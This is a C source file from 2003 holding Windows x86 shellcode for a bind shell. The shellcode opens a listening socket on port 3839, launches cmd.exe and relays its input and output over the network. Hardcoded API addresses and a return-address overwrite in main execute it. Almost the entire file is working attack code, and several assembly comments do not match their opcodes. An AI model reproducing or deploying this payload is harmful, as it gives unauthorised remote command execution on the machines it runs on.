// The Dark Raver // 27/03/2003 // 517 bytes // PIPES + BINDSHELL + CMD // - Port: 3839 // - Hardcoded API offsets // - Without Nulls #include char hell[]= "\x55" /* push %ebp */ "\x89\xe5" /* mov %esp,%ebp */ "\x83\xec\x68" /* sub $0x68,%esp */ "\x31\xdb" /* xor %ebx,%ebx */ // ---- Creacion del array de llamadas al API ---- // call WSAStartup = 0x71A341DA = 0x08(%ebp) // call socket = 0x71A33C22 = 0x0C(%ebp) // call bind = 0x71A33ECE = 0x10(%ebp) // call listen = 0x71A35DE2 = 0x14(%ebp) // call accept = 0x71A3868D = 0x18(%ebp) // call CreatePipe = 0x77E5727A = 0x1C(%ebp) // call SetStdHandle = 0x77E5FF2E = 0x20(%ebp) // call DuplicateHandle = 0x77E59CE3 = 0x28(%ebp) // call CloseHandle = 0x77E57963 = 0x2C(%ebp) // call CreateProcessA = 0x77E41BB8 = 0x34(%ebp) // call PeekNamedPipe = 0x77E97624 = 0x3C(%ebp) // call ReadFile = 0x77E58B82 = 0x40(%ebp) // call send = 0x71A31Af4 = 0x44(%ebp) // call recv = 0x71A51020 = 0x48(%ebp) // call WriteFile = 0x77e59d8c = 0x4C(%ebp) // ---- socket + bind + listen + accept ---- // x = 16; // &x = 0xffffffe4(%ebp) "\x89\x5d\xe4" /* mov %ebx,0xffffffe4(%ebp) */ "\xc6\x45\xe4\x10" /* movb $0x10,0xffffffe4(%ebp) */ // WSAStartup(257, &info); // &info = 0xffffedc0(%ebp) "\x8d\x85\xc0\xef\xff\xff" /* lea 0xffffedc0(%ebp),%eax */ "\x50" /* push %eax */ "\x31\xd2" /* xor %edx,%edx */ "\x66\xba\x01\x01" /* mov $0x101,%dx */ "\x52" /* push %edx */ // call WSAStartup = 0x71A341DA "\xb8\xDA\x41\xA3\x71" /* movl $0x71A341DA,%eax */ "\xff\xd0" /* call *%eax */ // hDes=socket(2, 1, 6); "\x6a\x06" /* push $0x6 */ "\x6a\x01" /* push $0x1 */ "\x6a\x02" /* push $0x2 */ // call socket = 0x71A33C22 = 0x0C "\xb8\x22\x3C\xA3\x71" /* movl $0x71A33C22,%eax */ "\xff\xd0" /* call *%eax */ // &hDes=0xffffff0c(%ebp) "\x89\x85\xc8\xef\xff\xff" /* mov %eax,0xffffefc8(%ebp) */ // serv_addr.sin_family = 2; // &serv_addr = 0xffffef50(%ebp) "\x31\xd2" /* xor %edx,%edx */ "\xb2\x02" /* mov $0x2,%dl */ "\x66\x89\x95\x50\xef\xff\xff" /* mov %dx,0xffffef50(%ebp) */ // serv_addr.sin_port = 65294; "\x66\xc7\x85\x52\xef\xff\xff\x0e\xff" /* movw $0xff0f,0xffffef52(%ebp) */ // serv_addr.sin_addr.s_addr = 0; "\x89\x9d\x54\xef\xff\xff" /* mov %ebx,0xffffef54(%ebp) */ // hSock = bind(hDes, (struct sockaddr *)&serv_addr, 16); "\x6a\x10" /* push $0x10 */ "\x8d\x85\x50\xef\xff\xff" /* lea 0xffffef50(%ebp),%eax */ "\x50" /* push %eax */ "\x8b\x85\xc8\xef\xff\xff" /* mov 0xffffefc8(%ebp),%eax */ "\x50" /* push %eax */ // call bind = 0x71A33ECE "\xb8\xCE\x3E\xA3\x71" /* movl $0x71A33ECE,%eax */ "\xff\xd0" /* call *%eax */ // hSock = listen(hDes, 5); "\x6a\x05" /* push $0x5 */ "\x8b\x85\xc8\xef\xff\xff" /* mov 0xffffefc8(%ebp),%eax */ "\x50" /* push %eax */ // call listen = 0x71A35DE2 "\xb8\xE2\x5D\xA3\x71" /* movl $0x71A35DE2,%eax */ "\xff\xd0" /* call *%eax */ // hSock = accept(hDes, (struct sockaddr *)&serv_addr, &x); "\x8d\x45\xe4" /* lea 0xffffffe4(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x85\x50\xef\xff\xff" /* lea 0xffffef50(%ebp),%eax */ "\x50" /* push %eax */ "\x8b\x85\xc8\xef\xff\xff" /* mov 0xffffefc8(%ebp),%eax */ "\x50" /* push %eax */ // call accept = 0x71A3868D "\xb8\x8D\x86\xA3\x71" /* movl $0x71A3868D,%eax */ "\xff\xd0" /* call *%eax */ // &hSock=0xffffefcc(%ebp) "\x89\x85\xcc\xff\xff\xff" /* mov %eax,0xffffffcc(%ebp) */ // ---- Creacion y manipulacion de los handlers ---- // saAttr.nLength = 12; // saAttr.lpSecurityDescriptor = 0; // saAttr.bInheritHandle = 1; "\x31\xd2" /* xor %edx,%edx */ "\x83\xc2\x01" /* add $0x1,%edx */ "\x89\x55\xd8" /* mov %edx,0xffffffd8(%ebp) */ "\x83\xc2\x0b" /* add $0xb,%edx */ "\x89\x55\xd0" /* mov %edx,0xffffffd0(%ebp) */ "\x89\x5d\xd4" /* mov %ebx,0xffffffd4(%ebp) */ // CreatePipe(&hChildStdoutRd, &hChildStdoutWr, &saAttr, 0); "\x53" /* push %ebx */ "\x8d\x45\xd0" /* lea 0xffffffd0(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x45\x50" /* lea 0xffffff50(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x45\x58" /* lea 0xffffff58(%ebp),%eax */ "\x50" /* push %eax */ // call CreatePipe = 0x77E5727A "\xb8\x7A\x72\xE5\x77" /* movl $0x71A3868D,%eax */ "\xff\xd0" /* call *%eax */ // SetStdHandle(-11, hChildStdoutWr); "\x8b\x45\x50" /* mov 0xffffff50(%ebp),%eax */ "\x50" /* push %eax */ "\x6a\xf5" /* push $0xffffef5 */ // call SetStdHandle = 0x77E5FF2E = 0x20 "\xb8\x2E\xFF\xE5\x77" /* movl $0x71A3868D,%eax */ "\xff\xd0" /* call *%eax */ // DuplicateHandle(-1, hChildStdoutRd, -1, &hChildStdoutRdDup , 0, 0, 2); "\x6a\x02" /* push $0x2 */ "\x53" /* push %ebx */ "\x53" /* push %ebx */ "\x8d\x45\x54" /* 0xffffff54(%ebp),%eax */ "\x50" /* push %eax */ "\x68\xff\xff\xff\xff" /* push $0xffffffff */ "\x8b\x45\x58" /* mov 0xffffff58(%ebp),%eax */ "\x50" /* push %eax */ "\x68\xff\xff\xff\xff" /* push $0xffffffff */ // call DuplicateHandle = 0x77E59CE3 = 0x28 "\xb8\xE3\x9C\xE5\x77" /* movl $0x71A3868D,%eax */ "\xff\xd0" /* call *%eax */ // CreatePipe(&hChildStdinRd, &hChildStdinWr, &saAttr, 0); "\x53" /* push %ebx */ "\x8d\x45\xd0" /* lea 0xffffffd0(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x45\x68" /* lea 0xffffff68(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x45\x5c" /* lea 0xffffff5c(%ebp),%eax */ "\x50" /* push %eax */ // call CreatePipe = 0x77E5727A = 0x1C "\xb8\x7A\x72\xE5\x77" /* movl $0x71A3868D,%eax */ "\xff\xd0" /* call *%eax */ // SetStdHandle(-10, hChildStdinRd); "\x8b\x45\x5c" /* mov 0xffffff5c(%ebp),%eax */ "\x50" /* push %eax */ "\x6a\xf6" /* push $0xfffffff6 */ // call SetStdHandle = 0x77E5FF2E = 0x20 "\xb8\x2E\xFF\xE5\x77" /* movl $0x71A3868D,%eax */ "\xff\xd0" /* call *%eax */ // DuplicateHandle(-1, hChildStdinWr, -1, &hChildStdinWrDup, 0, 0, 2); "\x6a\x02" /* push $0x2 */ "\x53" /* push %ebx */ "\x53" /* push %ebx */ "\x8d\x45\x6c" /* lea 0xffffff6c(%ebp),%eax */ "\x50" /* push %eax */ "\x68\xff\xff\xff\xff" /* push $0xffffffff */ "\x8b\x45\x68" /* mov 0xffffff68(%ebp),%eax */ "\x50" /* push %eax */ "\x68\xff\xff\xff\xff" /* push $0xffffffff */ // call DuplicateHandle = 0x77E59CE3 = 0x28 "\xb8\xE3\x9C\xE5\x77" /* movl $0x71A3868D,%eax */ "\xff\xd0" /* call %eax */ // ---- Lanzamiento de cmd.exe ---- // memset(&piProcInfo, 0, 16); // &piProcInfo=0xffffefb0(%ebp) "\x8d\xbd\xb0\xef\xff\xff" /* lea 0xffffefb0(%ebp),%edi */ "\x88\xd8" /* mov %bl,%al */ "\x31\xc9" /* xor %ecx,%ecx */ "\xb1\x16" /* mov $0x16,%cl */ "\xf3\xaa" /* repz stos */ // memset(&siStartInfo, 0, 68); // &siStartInfo= 0xffffef60(%ebp) "\x8d\xbd\x60\xef\xff\xff" /* lea 0xffffef60(%ebp),%edi */ "\x88\xd8" /* mov %bl,%al */ "\x31\xc9" /* xor %ecx,%ecx */ "\xb1\x68" /* mov $0x68,%cl */ "\xf3\xaa" /* repz stos */ // CreateProcess(0, "cmd.exe", 0, 0, 1, 0, 0, 0, &siStartInfo, &piProcInfo); "\x8d\x85\xb0\xef\xff\xff" /* lea 0xffffefb0(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x85\x60\xef\xff\xff" /* lea 0xffffef60(%ebp),%eax */ "\x50" /* push %eax */ "\x53" /* push %ebx */ "\x53" /* push %ebx */ "\x53" /* push %ebx */ "\x6a\x01" /* push $0x1 */ "\x53" /* push %ebx */ "\x53" /* push %ebx */ // push &cmd.exe "\xeb\x02" /* jmp +2 */ "\xeb\x0d" /* jmp +13 */ "\xe8\xf9\xff\xff\xff" /* call -7 */ "cmd.exe\x20" /* command string */ "\x53" /* push %ebx */ // call CreateProcessA = 0x77E41BB8 "\xb8\xB8\x1B\xE4\x77" /* movl $0x77E41BB8,%eax */ "\xff\xd0" /* call *%eax */ // ---- Bucle de comunicacion entre socket y handlers ---- // loop: // Delay... "\xb9\x10\x10\x10\x10" /* mov $0x10101010,%ecx */ "\xe2\xfe" /* loop -2 */ // PeekNamedPipe(hChildStdoutRdDup, chBuf, 127, &dwRead, 0, 0); "\x53" /* push %ebx */ "\x53" /* push %ebx */ "\x8d\x45\x60" /* lea 0x60(%ebp),%eax */ "\x50" /* push %eax */ "\x6a\x7f" /* push $0x127 */ "\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */ "\x50" /* push %eax */ "\x8b\x45\x54" /* mov 0xffffff54(%ebp),%eax */ "\x50" /* push %eax */ // call PeekNamedPipe = 0x77E97624 "\xb8\x24\x76\xE9\x77" /* movl $0x77E41BE6,%eax */ "\xff\xd0" /* call *%eax */ // if(dwRead==0) "\x39\x5d\x60" /* cmp %ebx,0x60(%ebp) */ "\x7e\x35" /* jle notif */ // ReadFile(hChildStdoutRdDup, chBuf, 127, &dwRead, 0); "\x53" /* push %ebx */ "\x8d\x45\x60" /* lea 0x60(%ebp),%eax */ "\x50" /* push %eax */ "\x6a\x7f" /* push $0x127 */ "\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */ "\x50" /* push %eax */ "\x8b\x45\x54" /* mov 0xffffff54(%ebp),%eax */ "\x50" /* push %eax */ // call ReadFile = 0x77E58B82 "\xb8\x82\x8B\xE5\x77" /* movl $0x71A3868D,0x40(%ebp) */ "\xff\xd0" /* call *%eax */ // send(hSock, chBuf, dwRead, 0); "\x53" /* push %ebx */ "\x8b\x45\x60" /* mov 0x60(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */ "\x50" /* push %eax */ "\x8b\x85\xcc\xff\xff\xff" /* mov 0xffffffcc(%ebp),%eax */ "\x50" /* push %eax */ // call send = 0x71A31Af4 "\xb8\xF4\x1A\xA3\x71" /* movl $0x71A3868D,0x40(%ebp) */ "\xff\xd0" /* call *%eax */ "\xeb\xa5" /* jmp loop */ // notif: // dwRead=recv(hSock, chBuf, 256, 0); "\x53" /* push %ebx */ "\x6a\x7f" /* push $0x127 */ "\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */ "\x50" /* push %eax */ "\x8b\x85\xcc\xff\xff\xff" /* mov 0xffffffcc(%ebp),%eax */ "\x50" /* push %eax */ // call recv = 0x71A51020 "\xb8\x20\x10\xA5\x71" /* movl $0x71A3868D,0x40(%ebp) */ "\xff\xd0" /* call *%eax */ // &dwRead=0xffffedb8(%ebp) "\x89\x45\x60" /* mov %eax,0x60(%ebp) */ // WriteFile(hChildStdinWrDup, chBuf, dwRead, &dwWritten, 0); "\x53" /* push %ebx */ "\x8d\x45\x60" /* lea 0x60(%ebp),%eax */ "\x50" /* push %eax */ "\x8b\x45\x60" /* mov 0x60(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */ "\x50" /* push %eax */ "\x8b\x45\x6c" /* mov 0xffffff6c(%ebp),%eax */ "\x50" /* push %eax */ // call WriteFile = 0x77e59d8c "\xb8\x8C\x9D\xE5\x77" /* movl $0x71A3868D,0x40(%ebp) */ "\xff\xd0" /* call *%eax */ // jmp loop "\xe9\x6a\xff\xff\xff" /* jmp loop */ ""; // TDR int main() { int *ret; LoadLibraryA("wsock32.dll"); printf("%d\n",strlen(hell)); ret = (int *)&ret + 2; (*ret) = (int)hell; }